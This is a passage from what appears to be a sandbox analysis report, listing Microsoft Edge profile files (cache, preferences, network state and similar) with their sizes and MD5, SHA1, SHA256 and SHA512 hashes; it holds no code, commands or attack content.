                                                                                                                                                                                                                                          8852e78a6ed93eeb86bc83e59f7970d5521ae0f0

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          552c42dc8e41e857b4b24fe79814a789df0085f449a177ed919addf0a57b0fa3

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          c9ccf7ec49307a130d58fa0557279c42ef50a0db0951c912ae33448de870b7e1f0928b87e64afb27cea6ac047925d8ddab7bb428bc15888ba5c996185432a93a

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_1

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          264KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          b6b26d4cc81549e84fde1ab608a5545e

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          224c2b49a174052a349328656f85f2fa52248a66

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          af1ac24a9d44fc8d7f742db57b13467ac2142513d3a6379afe069a12b1b6a277

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          044d46befb5a5feffba93e99688b6ed024ba4d9b78f2a10d63fb8ea4fe40773e8bc2d2297763392a3058500b972b10e3fd19a911afb52dba0f4ff0536806410b

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_2

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          1.0MB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          25dc334920f7702f7a1325e7dae9f64b

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          3d2bf84dac54bf31abc9205b128b9362b1908316

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          f13c1100d88f965b2fb3f793fc4fb77a4b284ca108fb68fb3959a8d080a4dd17

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          e3378bd6cf2a616f1d872443554f676b0fdf8b5d71b7fa24a60b32953b87408afeb121921400747772e399939d96dac1b93e39690f6ea4d8c992d8b5fab6fdfb

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_3

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          8.0MB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          4ac84895be909359c96dcfc2e18b924d

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          05aa3c6555bab044ce03c4c187521d62c0ee72db

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          f867be76716127af450c34353d1221425a173eae011b8c201078826c63a4f6df

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          93ee1b04932792c9b9b9703ca6bae502ff8e1b2933029eb0b7003a87ccac560be7fbe0be13c619fa24f9d98029b3c950f0f326acbec5eb7abf3bad2750dc8416

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000063

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          26KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          3db01f3289b7517e321aac642a91c7f3

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          4d54518f6f94dbe3e4e0cd7cc0d13698272d197f

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          45c8217bf1571647763788b5472b9621330f6b065ea3107e2c6340a60ccb73a1

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          69e7726636a206b910a971c00bb9a2a79835e5f98bc588158f62484ae77cfed138f8741e68b6d69ce77830420bb87df46762c51862a80f01d04112a3561673cc

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000064

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          75KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          fa8f9bcd49d8be8044ba99a1f17086ff

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          ed3b9622b7738f8a9d747abcaad09be709d3a32e

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          b000f2b458bc10dc8bf0105c37d260e7981e98bcaa85b990bad65720e6b1dc03

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          f924c1b77399f8395a5962858d38b43975413609e084a5b7d8f50b2147f6c0910d4e0a5359e2310ed6c2197b396e483517496482fb2759ed47cc862500d6ea74

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000065

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          115KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          715d593456fa02fe72a008a72398f5be

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          e948290773216dc1b50c2121314a8cf918c22b54

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          c411f11975d26eb04cd2aa3c071181d4b18e489f1fb97060d4176a3531dfb36e

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          1f63209c93a462c2690442c9cf1c3e5a67f2df7a67dfcda2cb81292a2dbb90641aa0ab81c25323a1f2d9f0fa09b3421d136ae5228c47e581c51912ba284de46e

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000066

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          153KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          237f4a0afbdb652fb2330ee7e1567dd3

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          69335cd6a6ac82253ea5545899cccde35af39131

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          1f0189e087fcefbf654fad74a3a06668b782c01353a61d5c0b7f0bf23e33c020

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          27e8e1f91507179c207f93a19485738ed5d372a977eb27d44a4ed163013097d38b117c7a5bf4336ecc9862ca514d78ffcd2b8a07e304bbfe1b2cce9c087baa38

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000067

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          19KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          5e5ae2374ea57ea153558afd1c2c1372

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          c1bef73c5b67c8866a607e3b8912ffa532d85ccc

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          1ef458d087e95119808d5e5fecbc9604d7805ea4da98170e2c995e967da308f3

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          46059e4a334e0a5295ebcef8401eb94b8fa0971b200f0f9e788ed61edae5018c917efd30b01631cbd6bdadc5240c9fcad2966ea0aa9c94b538bcc369e10bbbaf

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000068

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          191KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          eaebb390ddb3b1c0e07904f935d29bd9

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          dca8da5b24b1b18b3c8dbc2523f5d145fd4dae13

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          9478515162e79256323883a5092b39e0045dc8213d7dcf7be5dcc1ec5b70e9e4

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          e2dae28c4661b3bb65b3811803a9396e1c9b16eb187b60f2d4d1a8cc65e2ad6ce0931a48e942b5d920bdc263ea939b9164b649edc3752e83daabef9366a186e8

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_0000c3

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          216KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          50a7159ff34dea151d624f07e6cb1664

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          e13fe30db96dcee328efda5cc78757b6e5b9339c

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          e990d9d31c4c7d57dd4795e43baea05501fb6ea8b7760f89001be660425dd01b

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          a7768dd7e315b07754a305080e0fc023765e5a224b2c3824e8e10f29286df63bbdefef379e069941fd8cd9c7c3befce976779ae2efdfb6e7da697b09d7f07250

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          5KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          acf30c415760cc84b33bc0b3139363a1

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          b042e4224fefbc480596dbe9b4baf05927252cc1

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          1c21fcb963fc803149a5923691a4b9fe21d67f6de4445f259e3482e91003eeb7

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          aa36ba600a6a8d9ba7586cff4933f13af33980dae8273343d7e2cba66a59dbff9f47976c4b35500ebebcaad62db5974e685f175d9c8f74b55b6e5073a6ac0697

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          5KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          0eafae447eea36a4b75146861eb25fb2

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          ef4541a5d67a6cc5cee853b482b3625b9560eb3f

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          926c432530dd776851981b7d895ff0530cede24d7749cbc120eac544901c987f

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          a78abac4f2b574e71336ed1ea20b23e8c33d39eebc2feec0d7b2f46363b8f4b65ff559c5e936c1f58351659d3037c5836e0947fc5ced10ec386f1f22b9e1bb4e

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          3KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          f0604ded4c8a266f0c2a1b33a6d3159a

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          8521ebc49ad3b94932ef31f1c3203aee375275d8

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          b6f91a114b6ed8fc04ac9c3ab46aa5d327150e350bf42e23def15a99159be116

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          39e9089db486d821b5f673f950cdd208849caa020d612d926359808c541984b3fbf3ce7ab9ecbc1d592f8af5e62f4a962865f7a3be6b42bffb5c1a47e4d308ee

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index~RFe578aac.TMP

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          3KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          0924d01bce95e4f71bffc2795011c4ae

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          01d6bdddd42045246d704586aaa601b609ab6478

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          3e6d1ba1e93eab6c3fcfc838c791dc57c445c68cf337061b7c8182b0cc6e1a60

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          556ba426b47ae3f05bfa91b0c18fb3653ac4eefebad451557d75675f87a06553da1439ef671754d2f0602e047c9804bef96eb813f432f6cc76ba212a6eee8a12

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          2B

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          99914b932bd37a50b983c5e7c90ae93b

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          513B

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          c92eabb217d45c77f8d52725ad3758f0

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          43b422ac002bb445e2e9b2c27d74c27cd70c9975

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          388c5c95f0f54f32b499c03a37aabfa5e0a31030ec70d0956a239942544b0eea

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          dfd5d1c614f0ebff97f354dfc23266655c336b9b7112781d7579057814b4503d4b63ab1263258bda3358e5ee9457429c1a2451b22261a1f1e2d8657f31240d3c

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          322B

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          de6528eb34eb19db6bd68e5a30b6c903

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          d2811657233d6c42b2424bb6852c5b6eee529d6f

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          00f7553ca06c31296caeb1d08cd614ee2a3018cdd0c74c4bacc30dac3dd428d4

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          f8a2e95d900645a73ba5b183322289bd0724721b246430e8d232c8daa2b002e9aba5c1963b955e643215a0f9972a3fac3de8c7a33d73ab868bb02b3c7db695dd

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.90.1_0\dasherSettingSchema.json

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          854B

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          4ec1df2da46182103d2ffc3b92d20ca5

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          fb9d1ba3710cf31a87165317c6edc110e98994ce

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Favicons

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          20KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          549ebcfb52df0003d22b3c92cd0ab634

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          09f3b4ce19038b84a18d581454916cb2ee195d48

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          f3740974374c0df35353e1396b7440fa05d357597101cf40087e3e00c63a3843

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          80e2ef95acfb24883f701c79dd263cd2624d194f222e03287ffbcc1629554a5877048f9cf2cb4210ffcf33c116a5d31a6719572f3174c0857221d308976661e7

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          192KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          271f171e47c627b889f515c894418d01

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          ee530e1b3818e4b127153c892a6a8a6a05944479

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          96f1401d7f2bbf1728db67408c88766d583666754e697b3bc1eb40ad092e7751

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          ff7edc8e1197532ea468deb2b2eeb8ffd9942474bd6d430285fbee3209855b9592f2db40190f85a8d5f387e683078b726664e440d94908bc4170dcd1e03b7be4

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\HubApps

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          107KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          2b66d93c82a06797cdfd9df96a09e74a

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          5f7eb526ee8a0c519b5d86c845fea8afd15b0c28

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          d4c064db769b3c109da2ed80a53fbab00987c17421a47921e41e213781d67954

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          95e45c0aea0e704be5f512dffaae377d4abef78da99b3bca769264d69be20f2570daf2f47905645217e1b2696e42b101f26149219f148b4d6dd97a6c2868b6f5

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_ntp.msn.com_0.indexeddb.leveldb\CURRENT

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          16B

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          46295cac801e5d4857d09837238a6394

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_ntp.msn.com_0.indexeddb.leveldb\MANIFEST-000001

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          23B

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          3fd11ff447c1ee23538dc4d9724427a3

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          1335e6f71cc4e3cf7025233523b4760f8893e9c9

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          720a78803b84cbcc8eb204d5cf8ea6ee2f693be0ab2124ddf2b81455de02a3ed

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          10a3bd3813014eb6f8c2993182e1fa382d745372f8921519e1d25f70d76f08640e84cb8d0b554ccd329a6b4e6de6872328650fefa91f98c3c0cfc204899ee824

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          334B

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          4e75fde14c4c2a90a7af90df4df49b8c

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          7c807b1778f7f8f2768a20e59ecbe346853b8a40

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          f272edd3a9e7baf5c5122e19b1e3a4cd0e543db0ad95794f6e5e625e7da4a310

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          f3cf6784ecc4eb96a8b148b5638ab5e16d5939a07bd9c320ca81f619f1c4f8adf0a441535f6d862a3a8efed8944fbc2cf356181e4fc3d3a897f5f15c433e4fd4

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          2KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          dbe5c31e2dd731f8a9f627d3dd6cee32

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          3a64e0d6014ceebb78681802cec161ba52fae611

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          474672acd7a303494867d05ea9bf10c56d508ef52193eca948e3d653a34595cb

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          ab165f59f53b5e8f5567f7a89ac26cbb65d82f283ed873beb3acadec733b691ec4dd1a3415a7ae37ebb412fd1935529d6b7d56d98078cef31b33eed9c9f539c6

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          8KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          f16a03ff855e3c9029fd6d1bda9233ef

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          799151c42ee7fffc4aff0e53448b524c54d2a60a

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          2ecad3c56a01cc3eba22092fbaaa81a714507eefab5b11d486516b040b4a3c37

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          1ac447544cdcecd0c629a00d0e719490711fd16660f51b153324f80b02e9ab1051d2b6050a90b3821c3e2096c7be1bfe1994f5ddbbcbb840541f76ae9c81d079

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          8KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          f4e4867874e7e5af7fc7fa336b07a746

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          b705f4ba05f15defda6cb31249c59a7391e5b683

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          6e861580c2ff97657ad1fec9da636acb5ce2f26599e80f8b53b3e66429a39ae7

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          e0f2193c6fc4ac420be25168d081cb2c1405c021fb5cae35f84abe2244cfe6b77effc724cafc0cce8713b26f459e77d243ec32baceef5f47575e9ef53f313368

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          2B

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          d751713988987e9331980363e24189ce

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          97d170e1550eee4afc0af065b78cda302a97674c

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          40B

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          20d4b8fa017a12a108c87f540836e250

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          1ac617fac131262b6d3ce1f52f5907e31d5f6f00

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          1KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          b7955dc20b505b4c7c233f4c27279b91

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          b59ef65b89431e96ef270df6a5715a8fc91d70fd

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          0e5d40db822bdb02083911f57ac545f6dba847e28d62f8264223417e2c703499

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          d1ff0bf6cf2235d836ddb0bdae89b39e27e3492374af87e6dd3a6b7d3dd96ef01b9c1c847b2eb8619236ce30701e86365f6b22794f7d18decb676d79f4a55f36

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          522B

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          9d666f8806f460ebb4bcc0df70c2f529

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          23dec84465dbc2743297e5fe143bc8eca981ed9f

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          e12895ab05934e60fdbaa916d575e92ea380515fd860775bbd25551daee48ef7

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          74e7b3669a16fd3e9b6b8793696b9b2d9c5d00dee3e610b99d50ab07ee491a4ffc343e73dfa234f2a828249cfe084e3e49b067dc44fe800601e7f54726e201a6

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          20KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          39f6b958f169481423f37df90dc76bbc

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          3b3a859873ee3f925bebb08235fbe3c65fd18d48

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          a2feb6a22cd28da292f31ff7436ed14c4ede7061b2eede1b908b6df1263d3bfe

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          0fac4bfb397b58128407d1260f9317ba89ce1d071349dd677717b9cd5feea89489fb75c19f0b4ef3f283c98f3b13ac2b5e14d4a137f03ab63dc6180abe0984fa

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          18KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          6970404cf5244878a12c45f740fbf068

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          f542a35a13fb2883415281d146c43ef4d8e5e5d4

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          be590e0518094a00aa639c78201e75c90f65f9f2f3bac6526e77098cab883137

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          34e0fbaaca512f9cc0cdd32b2d2f8723db04a32562e59ce5377585478e2b78600c6fdee085fccd053222835a8cbff8637ef766acec9de73ceb043993c7e0127d

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          20KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          aec5d790037cd3764a952d6e77a7d409

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          a8cf0dc7b48cd0a5c9f8e8f27b7f0643f5ef4956

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          3837089fecf02cd8b23d7535fdf7bedb8d8c5a3b3acd0cd5b268ce6d42f94f52

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          17caa6c89fff18d2dc5cf24a7ecd05024985f393bdea1bf63e05ae8a602c40facae3ae18dab23a12c3a84ed9f2e8038816d25e774cc60404824b9373203b775b

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          17KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          70e508c64db0e01f535eb12b0631c921

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          c3c39022e2bd5b41eb6774dd60099969d3bbec93

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          3f387e1de3c434edd117e58c4a17de0de20b9566340ab130b9863edda9106758

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          8b3cbfa9d3afc4e6764c6fc5cc35046cdb1fe7bbd7ea8acd9f893058d8ff3895e6b4e073bbbef697bb6c67e5b2340943581742068ef42008082b3d21c53ee9bf

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

                                                                                                                                                                                                                                          Filesize

